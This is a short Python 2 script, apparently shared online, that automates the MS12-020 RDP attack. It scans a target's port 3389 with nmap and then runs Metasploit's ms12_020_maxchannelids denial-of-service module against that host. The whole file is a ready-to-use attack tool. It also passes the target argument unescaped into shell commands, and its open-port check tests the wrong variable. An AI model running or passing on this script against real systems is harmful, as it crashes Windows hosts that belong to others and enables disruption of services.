MS12_020 RDP Auto Exploit Python Script

1. #!/usr/bin/env python
2. print """
3.  *************************************************************
4.  \tAUTO EXPLOITER(ms12_020 rdp Exploit) \t
5.  \tWRITTEN BY : TEJASH PATEL \t
6.  \tFACEBOOK : https://www.facebook.com/tejash1991\t
7.  \tYOUTUBE CHANNEL : https://www.youtube.com/user/tejash443\t
8.  *************************************************************
9. """
10. import os
11. import sys
12. import subprocess
13. import re
14.  
15. if os.getuid() != 0:
16.   print 'requires root privileges.'
17.   sys.exit(1)
18.  
19. def usage():
20.   if len(sys.argv) != 2:
21.     print 'Usage: ./smb.py [RemoteHost]'
22.     print 'EX)    ./smb.py 192.168.1.50'
23.     print 'Watch Video - https://www.youtube.com/watch?v=03U0yDJ-TtI&feature=youtu.be'
24.     sys.exit(1)
25. usage()
26.  
27.  
28. RHOST = sys.argv[1]
29.  
30. nmap = subprocess.Popen('nmap -p3389 %s -oN /tmp/nmap.txt' %RHOST, shell=True).wait()
31.  
32. nmapresul = open('/tmp/nmap.txt', 'rU')
33. found= nmapresul.read()
34. vulnerability = re.search(r'3389[/]tcp\sopen', found)
35. if not found:
36.   print '\n3389 Port is close'
37.   sys.exit(1)
38.  
39. print '\nPort Is Open.Let me Check ms12_020 rdp Exploit'
40.  
41. metasploit = subprocess.Popen('msfcli auxiliary/dos/windows/rdp/ms12_020_maxchannelids  RHOST=%s  RPORT=3389 E' %RHOST, shell=True).wait()
42. subprocess.Popen('rm -f /tmp/nmap.txt > /dev/null', shell=True).wait()